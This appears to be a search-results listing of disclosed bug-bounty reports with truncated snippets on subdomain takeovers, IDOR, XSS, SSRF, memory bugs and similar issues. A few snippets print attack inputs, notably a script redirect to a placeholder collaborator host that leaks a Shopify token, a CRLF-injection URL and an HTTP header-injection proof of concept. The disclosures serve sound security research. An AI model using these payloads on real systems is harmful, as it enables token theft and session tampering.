15369 matches found
Gratipay: Gratipay uses the random module's cryptographically insecure PRNG.
Dear Gratipay bug bounty team, Summary --- Gratipay currently uses the random module's pseudo-random number generator which is not a cryptographically secure PRNG as stated in the docs: The pseudo-random generators of this module should not be used for security purposes. For security or...
HackerOne: Internal attachments can be exported via "Export as .zip" feature
Hello HackerOne Team This newly disclosed report: 182358 Partial disclosure of report activity through new "Export as .zip" feature was not completely fix. I have found that i can still view the attachment after it is being removed on the thread. Best PoC is this 182358 since this is the newly fi...
Ubiquiti Inc.: Subdomain Takeover (moderator.ubnt.com)
Hello Team This report is same as 179110 One of your subdomain http://moderator.ubnt.com is pointing towards 216.58.203.243 moderator.ubnt.com 216.58.203.243 ghs.google.com 216.58.203.243 ghs.l.google.com F134183 And it is unclaimed When I open it it is showing F134184 Impact :- An attacker can...
Shopify: Add signature to transactions without any permission
Hi, I found an endpoint for transaction signing but user permission not checked on this endpoint So an user without any permission in shop can add signature to transactions! Endpoint: /admin/securefiles.json Parameters:...
Internet Bug Bounty: Cross-protocol attack on TLS using SSLv2 (DROWN) (CVE-2016-0800)
General DROWN was responsibly disclosed to the OpenSSL team prior to the public disclosure. This OpenSSL blog post, by Viktor Dukhovni and Emilia Käsper, describes the vulnerability: https://www.openssl.org/blog/blog/2016/03/01/an-openssl-users-guide-to-drown/ This is probably a good opportunity ...
Paragon Initiative Enterprises: SMTP server allows anonymous relay from internal addresses to internal addresses
Hello, Issue descripton your incoming SMTP servers, provided by google , seems to be accepting without authentication mails from addresses @paragonie.com and destined for addresses @paragonie.com. This can greatly ease spear-phishing attacks, as users usually put much trust into emails coming fro...
Bumble: Account Takeover
Hello this is regarding an account takeover via import image from facebook option, when we import fb photos a link with a token generated which is valid for any user and it can be use to replace user linked fb account to attacker fb account And then login via fb to takeover account Note: I tested...
Ruby on Rails: Regarding [CVE-2016-0752] Possible Information Leak Vulnerability in Action View
Possible Information Leak Vulnerability in Action View. There is a possible directory traversal and information leak vulnerability in Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2 patch was not covering all the scenarios. This vulnerability has been assigned the CVE...
Radancy: SSL certificate invalid date
This SSL certificate is either expired or not yet valid. Some browsers will continue connecting to the site after presenting the user with the warning, while others will prompt the user with a dialog box requesting their approval to proceed. These warnings are extremely confusing for the typical...
Internet Bug Bounty: Integer overflow in unserialize() (32-bits only)
https://bugs.php.net/bug.php?id=68044...
curl: Security Analysis Report: CURL Integer Overflow Vulnerability
Vulnerability Overview Vulnerability Type: Integer Overflow in HTTP chunked encoding Location in Source: lib/httpchunks.c line 173 lib/curlx/strparse.c lines 185–186 Impact: Integer overflow leads to memory corruption Can cause buffer overflow Results in Denial of Service DoS for curl Potential...
curl: CVE-2024-6874: macidn punycode buffer overread
The libcurl at commit 58772b0e082eda333e0a5fc8fb0bc7f17a3cd99c contained a stack-buffer overread in the function macidntoascii that could be triggered when the host of a URL was converted to punycode. The root cause was in the function uidnanameToASCIIUTF8, which left the output buffer unterminat...
curl: Buffer Overflow Vulnerability in WebSocket Handling
Vulnerability description not provided...
FetLife: Able to see highest poll result without voting or view result
Vulnerability description not provided...
HackerOne: Hacker email disclosed on submission at hackerone hactivity
Vulnerability description not provided...
HackerOne: Takeover of hackerone.engineering via Github
The hacker was able to take over the hackerone.engineering domain after a brief misconfiguration window on GitHub. They claimed the domain in their own repository while the DNS records were still pointing towards GitHub. The issue has been resolved and no malware was found on the site during the...
GitHub: Authentication bypass on gist.github.com through SSH Certificates
An authentication bypass vulnerability was found in GitHub Enterprise Server that allowed unauthorized access to modify other users' secret gists through SSH certificates. The vulnerability affected all versions of GitHub Enterprise Server prior to 3.9 and was fixed in versions 3.4.18, 3.5.15,...
Nextcloud: Mail app - blind SSRF via smtpHost parameter
A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to retrieve services running locally on the server and scan the internal network for information. The vulnerability was found in the smtpHost parameter and could be exploited by any user with the mai...
GitLab: Stored-XSS with CSP-bypass via labels' color
Stored-XSS with CSP-bypass was discovered in Gitlab that allowed attackers to execute arbitrary actions on behalf of victims at the client side. This was possible due to the import of unsanitized label colors from Github, which led to the execution of malicious JavaScript code...
U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
A vulnerability in the web services interface of Cisco Adaptive Security Appliance ASA Software and Cisco Firepower Threat Defense FTD Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted...
EXNESS: subdomain takeover at odoo-staging.exness.io
Domain: https://odoo-staging.exness.io PoC https://odoo-staging.exness.io Cname: $ host odoo-staging.exness.io odoo-staging.exness.io is an alias for exness-stg.odoo.com. exness-stg.odoo.com has address 141.95.172.222 exness-stg.odoo.com mail is handled by 10 eu123a.odoo.com. Impact Scam, phishin...
Zomato: Attacker shall recieve order updates on whatsapp for users who have activated whatsapp notification
H Summary: 1. Order ID are IDOR Insecure Direct Object Reference 2. When users activated whats app notification an attacker would start receiving the notification without user interaction about their order. Proof Of Concept:- When an user order on a restaurant he/she can start whatsapp notificati...
Nextcloud: SMTP Command Injection in iCalendar Attachments to Emails via Newlines
Note: This is similar to 1509216, but has a new source/attack vector. Apologies for not picking this up earlier. Summary: When users receive iCalendar attachments in Mail, there is an option to add it to their calendar: ██████████ Once they add it to calendar, a PUT request is sent: PUT...
U.S. Dept Of Defense: Expired SSL Certificate allows credentials steal
Hi security Team! I've found this website with no valid SSL Certificate. https://██████████ Certificate has expired 314 days ago. Impact Error message can appear on page and user can have his credentials stolen by an attacker capturing the network data. System Hosts ███████ Affected Products and...
GitHub Security Lab: Python: Add support of clickhouse-driver package
This bug was reported directly to GitHub Security Lab...
Reddit: XSS
hi security team i have found a XSS in old.reddit.com and in reddit.com Description: Cross-site scripting also known as XSS is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the...
Ruby: RubyのCGIライブラリにHTTPレスポンス分割(HTTPヘッダインジェクション)があり、秘密情報が漏洩する
PoC1: !/usr/bin/env ruby require 'cgi' cgi = CGI.new url = "http://example.jp\r\nSet-Cookie: foo=bar;" External Parameter print cgi.header'status' = '302 Found', 'Location' = url Actual Result1: $ curl -s -i http://localhost:8080/cgi-bin/cgi.ru HTTP/1.1 302 Found Date: Fri, 21 May 2021 00:46:33 G...
curl: CVE-2021-22901: TLS session caching disaster
Summary: lib/vtls/openssl.c osslconnectstep1 sets up the osslnewsessioncb sessionid callback with SSLCTXsesssetnewcb, and adds association from dataidx and connectdataidx to current conn and data respectively: SSLCTXsetsessioncachemodebackend-ctx, SSLSESSCACHECLIENT | SSLSESSCACHENOINTERNAL;...
Open-Xchange: Null pointer dereference in lib-sieve after calling sieve_binary_block_index
There are some places that program calls function sievebinaryblockindex without checking the return valuemainly in sieve-binary-dumper.c. Such as: pigeonhole/src/lib-sieve/sieve-binary-dumper.c: bool sievebinarydumperrunstruct sievebinarydumper dumper, struct ostream stream, bool verbose struct...
Rockstar Games: Open redirect on https://signin.rockstargames.com/connect/authorize/rsg
In this report, the researcher found that a previously-addressed Open Redirect vulnerability on https://signin.rockstargames.com/connect/authorize/rsg had once again become exploitable. We were able to quickly re-apply our previous solution and once again resolve the vulnerability...
Shopify: Screenshot Service leaks X-ABS-App-Token
Login and create a development store 2. Start Burp Suite and open a burp collaborator client then copy the collaborator payload 3. Edit the section header.liquid of your current theme. Adding this: window.location="https://pasteherecollaborator/"; Finally go to...
U.S. Dept Of Defense: IDOR to Account Takeover on https://████/index.html
Hello Team! Summary: I found when you wish to update your profile on https://███████/ after your login through https://██████████/signIn/signIn.html website due to an IDOR. This IDOR gives you the opportunity to change the origin email for the registered account by changing the ID parameter on th...
U.S. Dept Of Defense: [██████████.mil] Cisco VPN Service Path Traversal
Hi team. Summary The Cisco VPN Service at ██████.mil is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversing within the web service's file system on the targeted device. Steps to Reproduce Make a GET request to: http...
Node.js third-party modules: [keyd] Prototype pollution
I would like to report a prototype pollution vulnerability in keyd module. It allows an attacker to inject properties on Object.prototype. Module module name: keyd version: 1.3.4 npm page: https://www.npmjs.com/package/keyd Module Description A small library for using and manipulating key paths i...
Internet Bug Bounty: PHP link() silently truncates after a null byte on Windows
The bug submitted at: https://bugs.php.net/bug.php?id=78862 The security advisory at: https://nvd.nist.gov/vuln/detail/CVE-2019-11044 The issue allow remote attackers to read or write arbitrary files via crafted input to an application that calls the vulnerable function. As demonstrated by a...
Node.js: napi_get_value_string_X allow various kinds of memory corruption
Summary: napigetvaluestringlatin1, napigetvaluestringutf8, napigetvaluestringutf16 are vulnerable to buffer overflows, partially due to an integer underflow. Description: napigetvaluestringlatin1, napigetvaluestringutf8, and napigetvaluestringutf16 behave like this: 1. If the output pointer is...
U.S. Dept Of Defense: Publicly accessible Grafana install allows pivoting to Prometheus datasource
Summary: A publicly accessible Grafana install exposes semi sensitive Dashboards. This also exposes the Prometheus proxied datasources which allow direct queries to a Prometheus instance which reveals sensitive data an opens the instance up to potential DoS via crafted requests. Description: Impa...
DataStax: Helpdesk Takeover at dmc.datastax.com
Summary: DNS record dmc.datastax.com is pointing to stale dmc-support.zendesk.com domain on Zendesk which is available for takeover. DNS Stale Records: F661014 Proof of Concept: There was no helpdesk configured at this address, which means that the address was available and anyone could claim it....
GitLab: Head pipeline leaked to unauthorized users via blocking merge request feature
Summary GitLab allows for public and internal projects to restrict the visibility of pipelines to project members only. Then, only project members should have access to the pipeline information. GitLab recently added the blocking merge request feature. This feature can be used to leak the head...
Internet Bug Bounty: Out of Bounds Memory Read in php_jpg_get16
I have found and reported an out of bounds memory read in PHP phpjpgget16 When PHP EXIF extension is parsing EXIF information from an image, e.g. via exifreaddata function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data what will...
curl: Insecure Frame (External)
Summary: Insecure Frame External Steps To Reproduce: Vulnerability Details identified an external insecure or misconfigured iframe. Remedy Apply sandboxing in inline frame For untrusted content, avoid the usage of seamless attribute and allow-top-navigation, allow-popups and allow-scripts in...
Snapchat: Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
Hey there, I was looking at your ads site with @daeken, we found some weird behavior in the import function of the creative app. Here are the steps: POC - Login to https://business.snapchat.com/ - Go to creative library - New Creative - Under "Topsnap Media", click on "Create" - Click on any of t...
Nextcloud: Predictable Random Number Generator
Description: The mobile application uses a predictable Random Number Generator RNG. Under certain conditions this weakness may jeopardize mobile application data encryption or other protection based on randomization. For example, if encryption tokens are generated inside of the application and an...
RATELIMITED: information disclosure which leak the apache version
Hello ratelimited team ! I have found a information disclosure which leak the apache version Link : https://social.ratelimited.me/manual/en/index.html Impact Leaking the http apache server version...
h1-5411-CTF: H1-5411 CTF Writeup
So, Hackerone posted a tweet about the Meme CTF Where barcode was in the tweet image by scanning it and decoding from hex I found this link : https://h1-5411.h1ctf.com/ where we can create/generate a memes and for generating the meme this was used form GitHub which i found in source code analysis...
Node.js third-party modules: [cloudcmd] Stored XSS in the filename when directories listing
I would like to report a Stored XSS issue in module cloudcmd It allows executing malicious javascript code in the user's browser. Module module name: cloudcmd version: 9.1.5 npm page: https://www.npmjs.com/package/cloudcmd Module Description Cloud Commander is an orthodox web file manager with...
Mail.ru: [dl.beepcar.ru] CRLF Injection
CRLF Injection via Get request PoC: https://dl.beepcar.ru/qwerty%0ASet-Cookie:%20test=qwerty;domain=.beepcar.ru HTTP Response: HTTP/1.1 302 Moved Temporarily Server: nginx/1.12.2 Date: Tue, 03 Apr 2018 19:20:31 GMT Content-Type: text/html Content-Length: 161 Connection: close Location:...
Mapbox: Admin Panel Accessed (OAuth Bypassed )
On December 4, 2017, @aneeskhan reported an authentication bypass vulnerability on a Mapbox internal portal. The vulnerability allowed them to bypass OAuth authentication and generate a valid session for the site. This session was then used by @aneeskhan to access information on the portal which...
Gratipay: i am The bug
I am the bug i found a bug in your site here it is F234717 my friend are the greatest hackers hackerone.com/s4k16 and smziaurrashid told me u will giv me $$$ for my father F234723...
WakaTime: Mailgun misconfiguration
During subdomain enumeration i found the following subdomain: email.mailgun.wakatime.com Looking at the cname records, it is pointing to mailgun. host email.mailgun.wakatime.com email.mailgun.wakatime.com is an alias for mailgun.org. mailgun.org has address 34.225.110.231 mailgun.org has address...